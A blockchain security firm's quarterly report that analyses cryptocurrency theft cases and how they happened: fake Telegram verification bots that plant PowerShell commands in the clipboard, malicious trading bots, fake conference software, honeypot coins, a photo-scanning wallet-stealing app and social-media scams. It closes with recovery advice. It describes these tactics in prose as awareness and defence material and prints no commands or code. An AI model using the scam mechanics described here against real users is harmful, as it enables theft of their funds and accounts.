SlowMist: 2025 Q1 MistTrack Stolen Funds Analysis

Author: Lisa

Editor: Sherry

Since 2024, SlowMist has launched a series of stolen form analyses, where we statistically and analytically review the stolen forms received each quarter. This series dissects common or rare malicious tactics using desensitized real-life cases. This year, we continue this series with the goal of helping industry participants better understand and prevent security risks, and to protect their assets.

According to statistics, the MistTrack Team received 5,830 stolen forms in Q1 of 2025, including 417 domestic forms and 5,413 international forms. We provided free evaluation services for these forms in our community. (Note: The content of this article only refers to cases submitted via the forms, excluding those submitted via email or other channels.)

In Q1, the MistTrack Team assisted 13 stolen clients in successfully freezing approximately $2.61 million in funds across 7 platforms.

Causes of Theft

In Q1 of 2025, private key leakage became the top cause of theft. Let’s take a closer look at the specific situation:

Fake Safeguard Verification

These scams mainly come in two types. One involves stealing Telegram accounts, where scammers lure users into entering their phone numbers, verification codes, or even Two-Step Verification passwords to steal their Telegram accounts. The other method involves planting trojans on the user’s computer, which has been a more common tactic recently.

Scammers often create fake X accounts impersonating KOLs and post Telegram links in the comment section, inviting users to join “exclusive” Telegram groups for investment information. Once users enter the Telegram channel, they are guided through a verification process. After clicking “Tap to verify,” a fake Safeguard bot appears, showing that verification is in progress. The verification window lasts only for a very short time, creating a sense of urgency that forces users to proceed with the operation.

As users continue to click, the verification window “pretends” to show that the verification has failed. Eventually, a prompt appears, instructing the user to manually complete the verification process.

The scammer thoughtfully configures Step 1, Step 2, and Step 3. At this point, the user’s clipboard already contains malicious code. If the user follows the guide and opens the command prompt, then pastes the malicious code by pressing Ctrl + V, the situation will look like the image below. In the command prompt, the full content of the code is not visible — a large blank area precedes the words “Telegram” and the malicious code. These malicious codes are typically Powershell commands. Once executed, they silently download more complex malware, ultimately infecting the computer with a remote control trojan (such as Remcos). Once the computer is compromised, hackers can remotely steal sensitive information such as wallet files, mnemonic phrases, private keys, and passwords, even leading to asset theft.

If you open it on your mobile phone, the scammer will gradually gain access to your Telegram permissions:

If you’re not using a Windows computer but a Mac, there are similar methods to lure your computer into being infected. The trick is similar, and if you’re interested, you can read about the new tactics in the article “New Scam Technique | Fake Safeguard Scam on Telegram.”

Malicious Telegram Bot

Recently, several users have reported thefts while using trading bots:

According to the forms, the most common scenario is when a new bot appears at the top of the channel. Believing it to be an official new release, users click on the new bot to import their private key and bind their wallet, ultimately leading to theft. Upon closer inspection, the bot has an “Ad” label (advertisement), which is a built-in advertising prompt from Telegram. Since this malicious trading bot appears in an official channel, users are often subconsciously led to believe it’s an official release. Please be cautious and verify carefully.

In addition, scammers may also pretend to be Telegram officials sending you messages, using scam tactics such as claiming account anomalies or expired logins, and guide you to click on phishing links.

We recommend that users first confirm whether their Telegram app was installed through official channels. When using trading bots, if you encounter a situation where you are asked to directly input your private key, please be cautious. Additionally, periodically check whether Telegram has authorized any fake bots. It is best to choose reputable trading bots, regularly check the security of the trading bot platform, ensure you are using the latest version, and strengthen your private key management practices.

Computer Poisoning

Recently, several users have reported incidents of computer poisoning, with the method still relying on social engineering combined with malware injection. The main techniques used are as follows:

1. Impersonation: Attackers often impersonate well-known venture capitalists (VCs) or business partners. They contact the targets via Telegram, LinkedIn, or email, and offer investment or cooperation opportunities.
2. Sending Conference Links: Attackers lure the target into joining a “conference” by providing a fake software download link, such as talksy[.]ca.
3. Guiding Software Installation: Once the victim downloads and installs the software, the malicious script is triggered.
4. Data Theft: The malware steals sensitive data, including system passwords, browser data, and encrypted wallet information. Some variants disguise themselves as macOS security validation requests, prompting the victim to enter their password, granting the malware higher-level permissions.
5. Remote Data Upload: Attackers package all the collected information and upload it to a Command and Control (C2) server (controlled by the attackers) through an encrypted channel.

In addition, attackers may steal the victim’s Telegram account and impersonate the victim to send messages to their contacts, inviting them to join a fake video conference, further expanding the scope of the attack. Telegram account theft is still an old tactic, mainly involving tricking victims into sharing their login codes, phishing for QR code login authorizations, or poisoning the computer. If discovered in time, it’s crucial to quickly go to the Telegram settings under Privacy and Security -> Active Sessions -> Terminate All Other Sessions, and then enable or modify Two-Step Verification.

Honeypot Scam

According to the form statistics, scams involving the inducement to purchase a “honeypot coin” have been steadily increasing. In most cases, scammers initiate private conversations with users, gain their trust, and then recommend investing in this coin. Since the coin lacks real market liquidity, investors are unable to sell or exchange it. The scammers will transfer the profits to their own wallet addresses. In some cases, scammers use a Ponzi scheme model, paying early investors with funds from new investors, creating a false impression of the coin’s rise to attract more participants. Once the pool of funds reaches a certain size, the scammers will disappear with the money.

In addition, some scams combine social engineering tactics, such as using fake news and manipulating community opinions to create a sense of FOMO (Fear of Missing Out), forcing users to invest hastily. It is recommended that users use token detection tools like Goplus to verify related tokens before participating. It is also a good practice to review the project’s whitepaper, team information, and other relevant details to avoid investing in any unverified ICOs or emerging tokens. Additionally, always remain cautious and skeptical about any “guaranteed high return” investment opportunities.

Malicious Software BOM

In February, several users reported that their wallet assets had been stolen. After analysis by the SlowMist AML team and OKX Web3 security team, the stolen cases all showed signs of mnemonic phrase/private key leakage. Further follow-up with affected users revealed that many of them had previously installed and used an app called BOM. In-depth investigation confirmed that this app was actually a carefully disguised scam. Cybercriminals used the app to induce users into granting authorization, allowing them to illegally obtain mnemonic phrases/private key access and carry out systematic asset transfers while concealing the theft.

Specifically, after entering the contract page, this malicious app tricks users into granting local file and photo album permissions under the pretext of being necessary for the app’s operation. Once the user grants the permissions, the app scans and collects media files from the device’s photo album in the background, then packages and uploads them to the server. If the user’s files or photo album contain information such as mnemonic phrases or private keys, the attackers may exploit the collected information to steal the user’s wallet assets. For more details, you can read the joint report by OKX & SlowMist: “OKX & SlowMist Joint Report: Bom Malware Hits Tens of Thousands of Users, Stealing Over $1.82 Million.”

RedNote Scam

In Q1, the number of scam cases on RedNote has increased, with significant financial losses reaching over a million dollars. By searching for keywords like “cryptocurrency,” “Bitcoin,” and “exchange” on RedNote, you can see many users sharing their profit/loss experiences, such as “multiplied by X times in one day,” “brave in the crypto world,” and “hundred U battle gods.” In the comment sections, numerous users are asking to be guided, which creates a “fishing pond” for scammers. Scammers bait users in the comment section, claiming to provide exchange installation services. The scam proceeds as expected — once the user takes the first step into Web3, they fall into the scammer’s trap by downloading a fake exchange, resulting in financial losses. Some scammers impersonate so-called “industry experts” or “investment masters,” showcasing fake investment success stories to build “credibility.” Then, they privately message users with supposed cryptocurrency investment opportunities, claiming to have insider information that guarantees profits. They also shift communication to other platforms to continue the scam. We urge users to remain vigilant and not trust others easily to avoid situations where you aim to earn interest, but the other party targets your principal.

Final Thoughts

In the world of blockchain security, attackers are everywhere, and defenders are at constant risk of being targeted due to any lapse in vigilance. Regarding how to handle devices infected with malicious software, we recommend users refer to the advice in the “Blockchain dark forest selfguard handbook”:

If you fall victim to an attack, with the mindset of not relying on luck and following the principle “a wise man does not stand under a dangerous wall,” you should promptly take the following actions:

For any wallets in use on your computer (including private key/seed phrase backup files), transfer the funds to a secure address immediately. Don’t assume that having a password for the wallet means it’s safe.

For important accounts and passwords, such as Telegram, X, email, trading platform accounts, etc. (including passwords saved in browsers or accounts you’ve logged into), you should change the passwords, update two-factor authentication (2FA), and check if there are any unknown devices logged into these accounts.

Install well-known antivirus software, such as AVG, Bitdefender, Kaspersky, Malwarebytes, etc., and thoroughly scan your computer. Choose one that suits you, and if necessary, pay for the premium version. If you’re still concerned, use two different paid ones, switching between them for thorough protection.

If you’re still worried, back up important files, then reset your computer. Afterward, return to step 3 and scan the backed-up files with antivirus software.

Just a reminder, these malware attacks target not only Windows but also Mac computers (and in some cases, Linux systems as well).

If you’ve fallen victim to cryptocurrency theft, we offer free community assistance to help evaluate your case. Simply submit the appropriate form based on the incident type (stolen funds, scam, or extortion). The hacker’s address you provide will also be shared with SlowMist InMist Lab’s Threat Intelligence Network for further risk control actions.

- Submit the Chinese form here: https://aml.slowmist.com/cn/recovery-funds.html

- Submit the English form here: https://aml.slowmist.com/recovery-funds.html

SlowMist has been deeply involved in the Anti-Money Laundering (AML) field for many years, developing a comprehensive and efficient solution that covers compliance, investigations, and audits. We are committed to fostering a healthy cryptocurrency ecosystem and providing professional services to the Web3 industry, financial institutions, regulatory bodies, and compliance departments. Our MistTrack platform offers compliance investigation services that include wallet address analysis, fund monitoring, and tracing. To date, MistTrack has accumulated over 300 million address tags, more than 1,000 address entities, 500,000+ threat intelligence data points, and 90 million+ risk addresses, providing strong protection against money laundering and ensuring digital asset security.

About SlowMist

SlowMist is a blockchain security firm established in January 2018. The firm was started by a team with over ten years of network security experience to become a global force. Our goal is to make the blockchain ecosystem as secure as possible for everyone. We are now a renowned international blockchain security firm that has worked on various well-known projects such as HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, etc.

SlowMist offers a variety of services that include but are not limited to security audits, threat information, defense deployment, security consultants, and other security-related services. We also offer AML (Anti-money laundering) software, MistEye (Security Monitoring) , SlowMist Hacked (Crypto hack archives), FireWall.x (Smart contract firewall) and other SaaS products. We have partnerships with domestic and international firms such as Akamai, BitDefender, RC², TianJi Partners, IPIP, etc. Our extensive work in cryptocurrency crime investigations has been cited by international organizations and government bodies, including the United Nations Security Council and the United Nations Office on Drugs and Crime.

By delivering a comprehensive security solution customized to individual projects, we can identify risks and prevent them from occurring. Our team was able to find and publish several high-risk blockchain security flaws. By doing so, we could spread awareness and raise the security standards in the blockchain ecosystem.